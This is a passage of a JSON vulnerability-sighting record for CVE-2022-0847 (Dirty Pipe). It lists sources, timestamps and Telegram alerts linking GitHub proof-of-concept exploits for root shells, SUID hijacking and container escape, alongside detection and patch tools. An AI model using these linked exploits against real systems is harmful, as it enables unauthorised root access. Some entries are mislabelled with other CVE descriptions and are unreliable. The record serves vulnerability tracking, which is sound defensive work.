{"vulnerability": "CVE-2022-0847", "sightings": [{"uuid": "22de37fe-f75e-433e-9a5a-1adcd55669c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "f3903951-6ded-4974-86b2-df9429cb590a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971535", "content": "", "creation_timestamp": "2024-12-24T20:30:47.789117Z"}, {"uuid": "fbe1a6bf-5b12-4a3f-ad28-7bb7cb86d0bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "3588465d-5c82-4a89-bc1e-f84e1c42f2da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-9d1c9d9f-675cdbc3d8f48478", "content": "", "creation_timestamp": "2025-03-01T00:19:16.950980Z"}, {"uuid": "45ced2f1-9237-485d-9069-5d498656d767", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:42.000000Z"}, {"uuid": "03cf5a30-5e6e-425b-8e29-38c3d9f29003", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://gist.github.com/spynika/260fb9a1a69004dfda87f52102a32fdb", "content": "", "creation_timestamp": "2025-02-24T06:44:02.000000Z"}, {"uuid": "1aad03b6-fc49-4f66-af4c-45665a8c99ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://bsky.app/profile/michaelxg.bsky.social/post/3lyawvzbt7k27", "content": "", "creation_timestamp": "2025-09-07T14:52:24.620055Z"}, {"uuid": "310c4edc-5766-49c1-a203-ba81d85af0d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:33.000000Z"}, {"uuid": "c84f4b9f-9f82-47dc-9efd-966827f2eccc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "confirmed", "source": "https://morgenm.github.io/blog/2025/dirtypipe/", "content": "", "creation_timestamp": "2025-07-05T10:00:00.000000Z"}, {"uuid": "f5492185-94fe-4ffc-b913-1b1745cb0d33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-50f1a5f6-768cfe71f5758dad", "content": "", "creation_timestamp": "2025-05-30T12:09:26.050338Z"}, {"uuid": "c7601ca1-6b2b-4b07-8a3d-01bd1e8912d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3m3lsuhbhh72o", "content": "", "creation_timestamp": "2025-10-20T02:54:48.653733Z"}, {"uuid": "e177fbcc-3b81-4446-be12-df651571c92b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/cve_2022_0847_dirtypipe.rb", "content": "", "creation_timestamp": "2022-03-10T17:35:16.000000Z"}, {"uuid": "1f91c8d1-1629-411e-b31f-caa8fad946a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lyc52xryz32e", "content": "", "creation_timestamp": "2025-09-08T02:15:12.988084Z"}, {"uuid": "a7682970-da90-4dbe-8812-fa9867deab4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-5996e413-521accfb6cd2622e", "content": "", "creation_timestamp": "2025-08-27T14:01:55.166797Z"}, {"uuid": "c76be2e1-0b18-4614-ba3c-4d2f5a2ab113", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://gist.github.com/Darkcrai86/b95ad3c09e144b1374ba582c8572df1a", "content": "", "creation_timestamp": "2025-08-29T13:26:19.000000Z"}, {"uuid": "a2bef30e-9853-4bf5-b9bc-9e052ece0264", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:03.000000Z"}, {"uuid": "18af660a-bb63-4f10-be86-3181d9ad3b5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://gist.github.com/Darkcrai86/8e24c88946a42f8f80b0ea8fada3c6be", "content": "", "creation_timestamp": "2025-08-29T20:08:55.000000Z"}, {"uuid": "fe26c1b2-4c91-4bc3-8bcf-1775d8e91b22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3mg6ku7obqi22", "content": "", "creation_timestamp": "2026-03-03T20:04:02.522702Z"}, {"uuid": "5b9a929a-fc4f-44d7-8f90-a9d863e4585d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2022-0847", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-c39acbe0-91886c343547fcce", "content": "", "creation_timestamp": "2025-12-05T12:35:58.444179Z"}, {"uuid": "b144ecee-a6e1-4039-8925-e9a96cab5e60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-be4c6ae6-41d04d89fb236f71", "content": "", "creation_timestamp": "2025-08-30T10:23:39.468687Z"}, {"uuid": "4df3de40-260c-4a46-93f4-30b27d20a947", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-1fdfda19-2805a58255f192e9", "content": "", "creation_timestamp": "2026-03-06T10:29:26.240715Z"}, {"uuid": "ca3d2286-a49f-4678-9ab6-303dfa54877a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://gist.github.com/namishelex01/c45e91ffc78335e7a096670758f310e6", "content": "", "creation_timestamp": "2025-12-17T18:58:48.000000Z"}, {"uuid": "e20c9876-6c3e-4a67-9f11-dfe30ed092f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=750", "content": "", "creation_timestamp": "2022-03-08T04:00:00.000000Z"}, {"uuid": "00035ddb-1455-437a-8420-523269d4f2ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://gist.github.com/aamixsh/3d5e1cb8dc17415acad151adc9c11e61", "content": "", "creation_timestamp": "2026-03-05T02:40:03.000000Z"}, {"uuid": "eeb548e9-0b14-4981-b428-64f9beb0cd8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://vulnerability.circl.lu/comment/b84ba3bb-d5e2-4d78-88a6-0c4cbcbe9dbb", "content": "", "creation_timestamp": "2025-07-11T20:52:01.806482Z"}, {"uuid": "ac3b0fd6-270e-46be-9898-22effd144178", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://gist.github.com/garagon/a8d92972c465aaeac354cd11668e409a", "content": "", "creation_timestamp": "2026-02-17T13:27:41.000000Z"}, {"uuid": "7ee9c554-1f32-48f0-a046-62009377cb4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://gist.github.com/getter-io/0349d7da5bf5228b61b558109cfbf434", "content": "", "creation_timestamp": "2025-12-27T16:50:10.000000Z"}, {"uuid": "1be3fef4-1b70-42f4-9e3f-8d987ab500f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mdkq4lwors2g", "content": "", "creation_timestamp": "2026-01-29T11:54:35.397441Z"}, {"uuid": "e9000675-3112-4199-89c6-60a64728604a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://gist.github.com/2lapetus/f4a117f808bea14c6bd47c83b440180e", "content": "", "creation_timestamp": "2026-01-11T07:44:20.000000Z"}, {"uuid": "2f94293b-1d87-44c8-811a-6e9765f6900a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2022-0847", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/df282871-b9b2-49f3-bfe2-fb77ae3083f4", "content": "", "creation_timestamp": "2026-02-02T12:27:48.626420Z"}, {"uuid": "43dc8a68-99a1-45cf-bb7f-23f40ef6dd61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://gist.github.com/prof-hac/76f2a4b0a2937cff2ca4b95dc94a2d2c", "content": "", "creation_timestamp": "2026-03-27T23:02:22.000000Z"}, {"uuid": "6fc51025-d5b5-4db0-bc70-20efec653a09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1631", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847\nURL\uff1ahttps://github.com/Al1ex/CVE-2022-0847", "creation_timestamp": "2022-03-09T02:50:36.000000Z"}, {"uuid": "817ef6fb-a4a8-42e9-af2c-611bcb4d9d75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1630", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aTest whether a container environment is vulnerable to container escapes via CVE-2022-0492\nURL\uff1ahttps://github.com/dadhee/CVE-2022-0847_DirtyPipeExploit", "creation_timestamp": "2022-03-09T01:59:27.000000Z"}, {"uuid": "ca7b33f0-2618-469a-9166-b30864326e2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1644", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847 Python exploit to get root or write a no write permission, immutable or read-only mounted file.\nURL\uff1ahttps://github.com/terabitSec/dirtyPipe-automaticRoot", "creation_timestamp": "2022-03-10T20:39:30.000000Z"}, {"uuid": "9e5c73df-f68d-40c3-9c5e-901c51f8863e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/cKure/9158", "content": "Dirty Pipe (CVE-2022-0847) temporary root PoC for Android.\n\nhttps://github.com/polygraphene/DirtyPipe-Android", "creation_timestamp": "2022-03-25T17:32:18.000000Z"}, {"uuid": "1b76e0fa-940a-456b-a850-46f7eaf50bb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2643", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aAn eBPF detection program for CVE-2022-0847\nURL\uff1ahttps://github.com/airbus-cert/dirtypipe-ebpf_detection\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-07-20T20:34:27.000000Z"}, {"uuid": "bd4eb155-84ac-481f-a5fe-daa645c949b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mjnbdecc2k2x", "content": "", "creation_timestamp": "2026-04-16T20:39:07.392418Z"}, {"uuid": "067eaee1-4e21-4315-a40f-41e3ac2e0807", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2253", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA Simple bash script that patches the CVE-2022-0847 (dirty pipe) kernel vulnerability on Debian 11\nURL\uff1ahttps://github.com/IHenakaarachchi/debian11-dirty_pipe-patcher\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-21T15:27:00.000000Z"}, {"uuid": "4dfe874b-9962-4c3b-9892-0a972ce630d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1632", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aDirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn. a root shell. (and attempts to restore the damaged binary as well)\nURL\uff1ahttps://github.com/MRNIKO1/Dirtypipe-exploit", "creation_timestamp": "2022-03-09T04:45:41.000000Z"}, {"uuid": "fdd48691-407c-4c13-891a-1ba3aec3936d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1641", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847 Linux kernel LPE POC\nURL\uff1ahttps://github.com/akecha/Dirty-pipe", "creation_timestamp": "2022-03-10T14:04:02.000000Z"}, {"uuid": "dc8678b9-89a8-439b-907c-bdbfb6809714", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1622", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847 DirtyPipe Exploit.\nURL\uff1ahttps://github.com/febinrev/dirtypipez-exploit", "creation_timestamp": "2022-03-08T11:54:26.000000Z"}, {"uuid": "7af165af-f347-413c-ae68-32e7ae5019d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1623", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847: Linux Kernel Privilege Escalation Vulnerability\nURL\uff1ahttps://github.com/ahrixia/CVE_2022_0847", "creation_timestamp": "2022-03-08T12:45:34.000000Z"}, {"uuid": "7a826690-4113-4c02-a365-38f2b2d704c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1621", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aAn exploit for CVE-2022-0847 dirty-pipe vulnerability\nURL\uff1ahttps://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit", "creation_timestamp": "2022-03-08T10:42:53.000000Z"}, {"uuid": "d7c863e3-94cc-4239-8e0f-bcd50060ec55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1618", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aLinux Kernel Local Privilege Escalation Vulnerability CVE-2022-0847.\nURL\uff1ahttps://github.com/antx-code/CVE-2022-0847", "creation_timestamp": "2022-03-08T08:34:31.000000Z"}, {"uuid": "168e43dd-8fde-488c-a613-4886da206e5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1629", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847\nURL\uff1ahttps://github.com/4luc4rdr5290/CVE-2022-0847", "creation_timestamp": "2022-03-08T20:20:22.000000Z"}, {"uuid": "2ec3adba-2871-4845-a61d-984de13e4269", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1627", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aBash script to check for CVE-2022-0847 \\\"Dirty Pipe\\\"\nURL\uff1ahttps://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker", "creation_timestamp": "2022-03-08T17:15:25.000000Z"}, {"uuid": "1381df0f-0206-4fba-8afb-8f18e35acf06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2444", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847 used to achieve container escape\nURL\uff1ahttps://github.com/greenhandatsjtu/CVE-2022-0847\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-06T14:07:19.000000Z"}, {"uuid": "1460b83d-c06a-45e4-92fa-2aefa3e035a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1654", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aDirty Pipe (CVE-2022-0847) zafiyeti kontrol\u00fc \nURL\uff1ahttps://github.com/realbatuhan/dirtypipetester", "creation_timestamp": "2022-03-13T19:32:04.000000Z"}, {"uuid": "b268ab67-8a82-4a06-839c-e8d02babd620", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/GithubRedTeam/1602", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-25636\nURL\uff1ahttps://github.com/Udyz/CVE-2022-0847", "creation_timestamp": "2022-03-07T14:34:43.000000Z"}, {"uuid": "d1c67f56-78d7-4e00-aff6-e02a21e15bf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1607", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aAn automated root exploit for CVE-2022-0847\nURL\uff1ahttps://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit", "creation_timestamp": "2022-03-07T18:57:08.000000Z"}, {"uuid": "eb5da772-99a7-42f5-84f8-2bfce4aed86a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1606", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847\u7b80\u5355\u6d6e\u73b0\nURL\uff1ahttps://github.com/imfiver/CVE-2022-0847", "creation_timestamp": "2022-03-07T18:39:00.000000Z"}, {"uuid": "55566a80-22d5-46b7-9206-3877aa70f83f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1603", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847\nURL\uff1ahttps://github.com/bbaranoff/CVE-2022-0847", "creation_timestamp": "2022-03-07T15:56:02.000000Z"}, {"uuid": "b9befbfc-33a4-4e5d-a050-db78a8baa7c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1610", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-0847 exploit one liner\nURL\uff1ahttps://github.com/carlosevieira/Dirty-Pipe", "creation_timestamp": "2022-03-07T21:01:48.000000Z"}, {"uuid": "8ac339fa-a1ac-48ce-bb6d-319135c2e234", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1681", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aHacked up Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn a root shell. (and attempts to restore the damaged binary as well)\nURL\uff1ahttps://github.com/LudovicPatho/CVE-2022-0847\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-03-18T22:53:32.000000Z"}, {"uuid": "d137d891-9d11-447b-b13b-78679b09a788", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1871", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aRHSB-2022-002 Dirty Pipe - kernel arbitrary file manipulation - (CVE-2022-0847) \nURL\uff1ahttps://github.com/mhanief/dirtypipe\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-04-06T03:34:15.000000Z"}, {"uuid": "52d70409-1d40-4e91-ac92-cddc230e22c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1870", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aHacked up Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn a root shell. (and attempts to restore the damaged binary as 